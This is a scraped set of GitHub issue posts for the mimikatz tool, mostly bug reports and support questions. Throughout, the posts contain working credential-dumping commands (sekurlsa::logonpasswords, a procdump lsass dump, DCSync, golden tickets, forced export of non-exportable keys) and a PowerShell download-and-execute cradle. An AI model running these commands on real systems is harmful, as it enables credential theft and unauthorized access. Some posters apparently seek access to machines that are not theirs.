gentilkiwi / mimikatz Goto Github PK

How to create a Log at a specific location using a batch file?
I currently use "mimikatz.exe privilege::debug log sekurlsa::logonpasswords" and need a way to make to make the log save to U:/results/mimikatz.txt

See https://creativecommons.org/faq/#can-i-apply-a-creative-commons-license-to-software

I recommend to choose another license.

its there is a method to execute mimikatz with an application called deep freeze? can someone help me with this please ............................

on win8.1 32 bits the pattern for cng patch is
{0xf6, 0x43, 0x1c, 0x02, 0x75} but should be {0xf6, 0x47, 0x1c, 0x02, 0x75}
just patched it and it works well now.
i have not tested with win8.0 but maybe the two different patterns are linked to 32/64 bits instead of win8.0/win8.1 versions ?

Hello Benjamin,

I get the error "kull_m_memory_copy (0x00000005)" when trying to use PTH with Windows 10 Build 10.0.14393 (Windows 10 Enterprise). Credential dumping works as usual.
I attached the log file, thanks for any advice you can give.
mimi.txt

Best regards,

Christoph

Warning 2 warning C4996: 'wcsicmp': The POSIX name for this item is deprecated. Instead, use the ISO C++ conformant name: _wcsicmp. See online help for details. G:\mimikatz\mimikatz\modules\kuhl_m_sid.c 263 1 mimikatz

and i solve with this... adding _CRT_NONSTDC_NO_DEPRECATE to preprocessor definitions.

this happens only in VS2013 ? thank you!

and thank u for ur excellent work!!!

Salut Benjamin,

it seems that mimikatz 2.1 from 06 May stopped working on windows 10 systems with activated Virtual Secure Mode and current patch sets installed.

To be precise, the commands "logonpasswords" and "msv" have become broken.

We obtain an endless list of values for the LSA Isolated Data attribute "Encrypted", or alternatively a crash popup "mimikatz for Windows has stopped working".

We tried it with a Microsoft Surfacebook (with TPM 2.0)
Windows 10 Enterprise (US) version 1511
OS Version: 10586.0 and 10586.318
LsaIso Version: 10.0.586.0 and 10.0.10586.212

At the end we used the newest Windows Patch:
May 10, 2016 — KB3156421 (OS Build 10586.318)

This update includes quality improvements and security fixes. No new operating system features are being introduced in this update. Key changes include:
Fixed additional security issues with kernel mode drivers, remote procedure calls, the Microsoft Graphics Component, Internet Explorer 11, Microsoft Edge, Windows Shell, Windows Journal,
Virtual Secure Mode, Schannel, and Jscript.

Greetings from Germany,
Jürgen
M

Following is a session transcript of mimikatz which triggers the crash popup:

  .#####.   mimikatz 2.1 (x64) built on May  6 2016 01:28:44
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 19 modules * * */
ERROR kull_m_busylight_devices_get ; CreateFile (deviceHandle) (0x00000020)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 6164539 (00000000:005e103b)
Session           : Interactive from 3
User Name         : admin
Domain            : COMPANY
Logon Server      : DC1
Logon Time        : 18.05.2016 13:17:47
SID               : S-1-5-21-504569365-2122958605-3922303804-1108
        msv :
         [00000003] Primary
         * Username : admin
         * Domain   : COMPANY
           * LSA Isolated Data: lmHash)
߶??¤ðgAÆL4$?ð?k¨ø,¨è¬??À*�Ÿ¶p?r?ßç®�~V�ý 'ÆK¡ó­?ó^è4  ±ö�-äb"£Ûæ
             Unk-Key  : 701857763ed94172143552903b20950a2fb1fc0488884e0d9ed4e1c3bc80ebd1838f736e3b7492dea90780caa6fd0100
             Encrypted:

Are you using known "payload" in your binaries ? my AV is preventing me from downloading the tool. See screenshot :

Thanks

hello, i ran mimikatz on windows server 2008 and i can't fix that

mimikatz #privilege::debug
Privilege '20' OK

mimikatz # misc::skeleton
ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)

i Got This error :

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_nt5_init ; kull_m_memory_search
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed

Has a new version of Mimikatz been published recently?I expected it happen a long time.

Hi, When trying to run mimikatz through the Invoke-Mimikatz.ps1 on a normal cmd it works fine,
when trying to run it through a python script such as:

command = "powershell.exe -ExecutionPolicy unrestricted ; IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:1234/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
os.system(command)

It fails and gives me the following output:

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (May 20 2014 08:55:05)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  14 modules * * */


mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

mimikatz(powershell) # exit
Bye!

Any help?

win10, it doesn't work. Can you fix it ?

Hi,

I am experimenting with sidhistory, but the sid module only seems to have the lookup and query function, the add and modify functions are missing in version 2.1 alpha 20160506.

or, what am I missing

Merci!

lsass.exe dump from Windows 2003 Server

procdump.exe -accepteula -o  -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp"
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
**ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (5) != MIMIKATZ_NT_MAJOR_VERSION (6)

I use 32 bit version for x86.

Tested on Windows 8.1 Update 1 dump.

kd:x86> .load c:\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 10 2014 01:53:29)
 .## ^ ##.  Windows build 9600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

32.0: kd:x86> !process 0 0 lsass.exe
32.0: kd:x86> 
Unable to read _LIST_ENTRY @ fffff80194eb10a0 

Error 1 error LNK2001: unresolved external symbol __imp__IsCharAlphaNumericW@4

thanks!

mimikatz open in admin mode.. windows 8.1 x64
What i did wrong? I must extract this cert to sign over 2000 pdf :/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

 0. Lucyna  G   Key Container  : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
        Provider       : cryptoCertum3 CSP - profil bezpieczny
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_Lucyna  GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
        Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

 0. Lucyna  G   Key Container  : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
        Provider       : cryptoCertum3 CSP - profil bezpieczny
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_Lucyna  GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
        Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)

Running DCSync against domains that have been renamed ends with this message:

ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x00002191 (8593)

That error code stands for

The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress).

Probable cause: Mimikatz does not set the DRS_EXTENSIONS_INT::dwReplEpoch value, so it always defaults to 0. But each domain rename increments this counter on DCs and if the client and the server are not in the same epoch, the server simply refuses to send replication changes.

Possible solution: IDL_DRSBind should be called again with the epoch that the server returns in the first call, if it is not 0.

Hey everyone,

really nice program! Congrats and thank you very much!

Though, I'm getting an error on Windows 7:
When running privilege::debug I'm getting "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege <20> c0000061"
and when running `sekurlsa::logonpasswords" I'm getting "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <0x00...5>"
Is there any get around?

Hello -

We have a Windows 10 pre-RS1 build and it appears that mimikatz is unable to run Sekurlsa::LogonPasswords .

It fails with this error:

ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

attached is screenshot.

Is this a known issue? Please help us get this working

Hi Ben!

I wanted to start a discussion about how we might work together to separate the UX/Console code from the core library that makes up the Mimikatz functionality. From there, I aim to wrap up the core library as a Meterpreter extension (ie. the kiwi extension that you already know!).

The reason I'm keen to do this here is because keeping the code in sync is a tough gig, especially given the rate at which you churn out features!

Are you open to teaming up and working on teasing the bits apart a little so that it's easier for us poor MSF folk to keep your latest and greatest stuff in Metasploit?

Cheers for all your awesome work, as always.

Hi all,

Is there any official documentation? Is there any appetite to create one?
One unofficial can be found in adsecurity blog.

Cheers,
Andreas

Link is:
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
Learn many from this,thank you so much!
And a little advice:
Installation and configuration of OpenSSL is very troublesome.
And I think there is an easier way：）
We can use cert2spc.exe and pvk2pfx.exe.
They are all included in the Microsoft Windows SDK and can be run separately.
The code is:

cert2spc.exe B53C6DE283C00203587A03DD3D0BF66E16969A55.der public.spc
pvk2pfx.exe -pvk raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -pi test -spc public.spc -pfx cert.pfx -f

I hope you will like it~

del

Salut Benjamin,

we tried the newest builds of mimikatz 2.1 alpha 20160602 / 20160525

Windows 10 Build 10240 RTM: PTH ok; PTT not working
Windows 10 Build 10586 Version 1511: PTH not working; PTT not working
Windows 7 SP1 PTH ok; PTT ok

The output of mimikatz claims that everthing went "ok" in all six cases.

Greetings,

goldfinger2

i came across minikatz when looking for a method to retrieve a "non exportable" key from a windows computer. the anti virus software running on the computer i happened to be using to download mimikatz flagged the software as a virus. this isn't particularly compelling, but in the interest of self preservation, and somewhat on a whim, i decided to investigate a little more. i uploaded mimikatz.exe to virustotal, which reported this analysis:

https://www.virustotal.com/en/file/c3c336a23021b68b026bdf1642b220d88037039aa6d7f8e7d4d576cc38063088/analysis/1470356182/

i'm accustomed to the world of crappy anti virus software and constant false positives, but it was a bit surprising to see so many claiming mimikatz to be a trojan, rootkit, malware, etc., but not find any references to this in the various resources discussing its use.

is just an inevitable nuance, given the nature of this software, and happens to be little more than a coincidence? if nothing else, i thought the author[s]/community might be interested to know this [even if it's just for the sake of being informed on principle], assuming it's not something which has already been mentioned.

I'm playing around with Kerberos dumping and cracking. I'm starting mimikatz and running "standard::base64" so that all the .kirbi files get exported using base64 encoding. However once I execute "kerberos::list /export" using base64, there are no output files in my directory. Mimikatz only saves .kirbi files when I DON'T use base64 encoding.

Hey,

I have seen some clients increasingly detect golden ticket activity with mimikatz-generated tickets based on the event log login of a domain of "<3 eo.oe ~ ANSSI E>". I see that this value is hardcoded in located here:

Is there a reason that this is hardcoded instead of dynamic? A providable domain name would be awesome here

Hi Ben,
I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature?
And thx again for your great work.

Hi @gentilkiwi ,

knowing that DCSync had problem with AD Recycle Bin being enabled, I tried it against a Windows Server 2016 TP5 DC with the Privileged Access Management Feature on, just out of curiosity. And guess what, it ends with error 8236 (The server does not support the requested critical extension), just as my own DSInternals does.

The solution will involve more than just fun with flags, as it was with DRS_EXT_RECYCLE_BIN, because the updated Doc states this: GR9 (DRS_EXT_GETCHGREPLY_V9, 0x00000100): If present, signifies that the DC supports DRS_MSG_GETCHGREPLY_V9. The DRS_MSG_GETCHGREPLY_V9 message basically adds link expiration timestamp to DRS_MSG_GETCHGREPLY_V6.

@asolino This issue most probably affects Impacket, too, though I cannot verify it right now.

Cheers
Michael

Erm hello I'm trying to get the password to a lappy running on windows 8.1,running on the current version of mimikatz on a 64bit
Before (windows 8) typing in Privilege::debug followed by sekurlas::Logonpasswords would work.
Now (windows 8.1) I'm getting a null for the password.
Could you help me by giving the commands to find the password for 8.1, please explain this to me I have no idea how any of this works.
Thanks.

1>kuhl_m_kerberos_ccache.obj : error LNK2001: external symbol RtlAnsiStringToUnicodeString unresolved

thanks

Salut Benjamin,

as we expect mimikatz 2.1 from 08 August don't work with the Windows 10 Build 1607 and Credential Guard
Windows 10 Enterprise (US) version 1607
OS Version: 14393.10
LsaIso Version: 10.0.14393.0

We attached the lsass dump file created by the taskmanager.

Greetings from Germany,

Jürgen
lsass-1607.zip

mimikatz How to Export Record?
Can you tell about it?

Hi,

I have a certificate with a private key marked as non-exportable. I use mimikatz to export the certificate:

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

0. xxxxx
        Key Container  : !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
        Provider       : Symantec PKI Client CSP
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_ xxxxx.der'
        Private export : OK - 'CURRENT_USER_My_0_ xxxxx.pfx'

I then use openssl to extract the public certificate and private key:

openssl pkcs12 -in my.pfx -out cert.pem -nokeys
openssl pkcs12 -in my.pfx -out key.pem -nocerts

The resulting cert.pem looks fine but key.pem has size 0. When I run:

certutil -user -store My

I get the following output:

My
================ Certificate 0 ================
Serial Number: 73f1964b9c30379490fa6db433e9ea96
Issuer: CN=xxxxx, O=xxxxx
 NotBefore: 2/19/2016 4:00 PM
 NotAfter: 2/19/2017 3:59 PM
Subject: OU=MULTI-ALLOWED, OU=RACERT, CN=xxxxx, CN=xxxxx
Non-root Certificate
Template:
Cert Hash(sha1): a4 2a 9e 45 95 8d 92 c6 43 d5 42 a3 c4 b6 19 af 21 fc 3c f7
  Key Container = !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
  Provider = Symantec PKI Client CSP
Private key is NOT exportable
ERROR: Could not verify certificate public key against private key
CertUtil: -store command completed successfully.

Do you know why I cannot export the private key? Thanks.

Since this change.... 0666f21

KrbCredExport (https://github.com/rvazarkar/KrbCredExport) and "kirbikator" does not recognize golden tickets format, obviously generated with mimikatz

C:\Users\yo\mimikatz\x64>kirbikator ccache cid63212.kirbi

  .#####.   KiRBikator 1.1 (x86) built on Jan 18 2016 01:57:51
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : MIT Credential Cache (simple)
 < cid63212.kirbi : format not recognized!

AND

C:\Users\yo\mimikatz\x64>KrbCredExport.py cid63212.kirbi cid63212.ccache

Ticket File Found, Converting to ccache
Traceback (most recent call last):
  File "C:\Program Files (x86)\Python27\Scripts\KrbConvert.py", line 52, in <module>
    KrbCred.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 88, in parsefile
    self.ticketpart.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 57, in parsefile
    self.encpart.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 24, in parsefile
    self.krbcredinfo.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 300, in parsefile
    self.starttime.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 185, in parsefile
    self.time = Time.convert_to_unix(strtime)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 170, in convert_to_unix
    t = datetime.datetime.strptime(timestr[:-1], '%Y%m%d%H%M%S')
  File "C:\Program Files (x86)\Python27\lib\_strptime.py", line 332, in _strptime
    (data_string, format))
ValueError: time data "\x1c\xa7\xcc(A'\xfa\xef\xa0\x16\xb1*B\x95" does not match format '%Y%m%d%H%M%S'

C:\Users\yo\mimikatz\x64>python --version
Python 2.7.12

Windows 10 x64 ver 1511

thank you!!

Just curious about why Windows 10 passwords are showing up as null for I was trying to remember how you get around it showing null but forgot why again the password shows up null someone refresh my memory again.

Ran it as Admin had Smartscreen off and turned off Bit Defender but I think their was something you had to do to get it to show the password.

I try to use mimikatz on Windows 10 Pro N (Build 1511) on VirtualBox but it gives me the following error when i use privilege::debug and can't begin my analysis
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

Hello Benjamin,

I'm facing a crash with the latest mimikatz when trying to export tickets from the sekurlsa module on a Windows Server 2012 R2 Evaluation system.
The command I launched: mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit".
You can find here below:

• The full dump crash
• The WER file
• A dump of my systeminfo.

Crash_mimikatz_sekurlsa_tickets_export.zip

Cheers.

Thanks for the great tool 👍

I am unable to open generated log file when using "mimikatz 2.1 (x64) built on May 25 2016 00:19:15" as below, getting 'Access Denied' alert

mimikatz.exe "log b3.txt" "sekurlsa::minidump test.dmp" "sekurlsa::logonPasswords full" "exit"

However if I use it as below, I am able to open generated log file

mimikatz # log b5.txt
Using 'b5.txt' for logfile : OK

mimikatz # sekurlsa::minidump procdump_64_192.168.56.50.dmp
Switch to MINIDUMP : 'procdump_64_192.168.56.50.dmp'

mimikatz # sekurlsa::logonPasswords full
Opening : 'procdump_64_192.168.56.50.dmp' file for minidump...

Authentication Id : 0 ; 1665464 (00000000:001969b8)
Session : Interactive from 0
User Name : Administrator

-----crop----

I'm trying to export user certificates from a system, but I'm ending up with the error kuhl_m_crypto_l_certificates ; CertOpenStore.

crypto::capi privilege::debug crypto::cng are were succesful.

The client machine on which I want to inject the TGT is non-domain joined system. getting this message after giving the needed command

http://s17.postimg.org/wyboxc8n3/123.png

What I am doing wrong?

Thanks.

Hello. Excellent tool!

When I export a wildcard certificate from My store it appears to export to a pfx properly but when I try to retrieve the private key it's just blank.

But after reimporting I see this (there's no private key):

Sorry for blurring out so much...

First of all this seems to be a great tool, thanks.

When I try to export my certificate it is exported without the private key, which doesn´t help me.

System info: Windows 2008 Server R2 64bits
mimikatz 2.1 x64 (downloaded today)

At some point I get error:
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)

I made sure I opened command prompt using the "Run as Administrator" and went over UAC. Because of that I´m assuming I have ACL permissions on the private keys.

I am sure the key is not there because when I use openssl to verify pfx (openssl pkcs12 -info) the BEGIN ENCRYPTED PRIVATE KEY is not there. And when I try to extract the key to a .pem (openssl pkcs12 -in pfx -out pem) the output file is empty.

Can you help?

Output (broken lines kept, sorry):

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export
 * System Store  : 'CERT_SYSTEM_STORE_LOCAL_MACHINE' (0x00020000)
 * Store         : 'My'

 0. wantedCert.com
        Key Container  : {some_key}
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Provider type  : RSA_FULL (1)
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
        Public export  : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.der'
        Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.pfx'

 1. WMSvc-IISDefaultCertificate
        Key Container  : WMSvc Certificate Key Container
        Provider       : Microsoft RSA SChannel Cryptographic Provider
        Provider type  : RSA_SCHANNEL (12)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : YES
        Key size       : 2048
        Public export  : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.der'
        Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.pfx'

On win 10, if you open mimikatz and try to get the passwords, you can not get it because it is impossible, I tryed with all: open like administrator,
-privileges::debug
"privilege 20 OK"
-sekurlsa::logonpasswords
"ERROR kuhl_m_sekurlsa_acquireLSA ; Modules Informations"
-lsadump::cache
"Domain: "
"Syskey: *******************"
"ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_regOpenKeyEx (SECURITY) (0x00000005)"
-lsadump::sam
"Domain: ***"
"Syskey: ****************************"
"ERROR kuhl_m_lsadump_getUsersandSamKey ; kull_m_registry_regOpenKeyEx SAM accounts (0x00000005)"

Pls getilkiwi help me.

I get an error when trying to patch CNG:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000005)

I tried to run mimikatz as Administrator and SYSTEM (via PsExec).

Hi,

I'd like to raise a feature request to support both English and French natively. I'd like to offer to spend the time to translate any french text to English. Is there a simple way to extract all text currently being used and to merge translations back in once done? Also happy to translate any documentation that is not yet in English.

Please let me know if this will be possible!

Cheers,
-T

Since Mimikatz is able to inject the ccache files generated in Linux, would it be possible to write a parser that can run under Linux to generate .kirbi files from the ccache file? I've tried to look into the code (kuhl_m_kerberos_ccache), but since nothing is commented I'm having a hard time to get into it.

Salut Benjamin,

the new mimikatz version from Aug 12 is working with Windows Build 1607 with and without Credential Guard. :-)
But we have a little issue together with Remote Credential Guard (RCG).

We used the following setup:
Source (RPC Client) Windows Build 1607 with Credential Guard protected
Target Windows Build 1607 without Credential Guard
We made a RPC-connection with the parameter "/remoteguard" to the target.
After running mimikatz on the target machine it will crash. (See attachments)
May be the problem is that the TGT-ticket on the target machine is a copy of the TGT-ticket of the source machine but without the session key. This is why the target must call back to the source to use his session key to decrypt the response from the TGS of the new service tickets.

Greetings from Germany

Juergen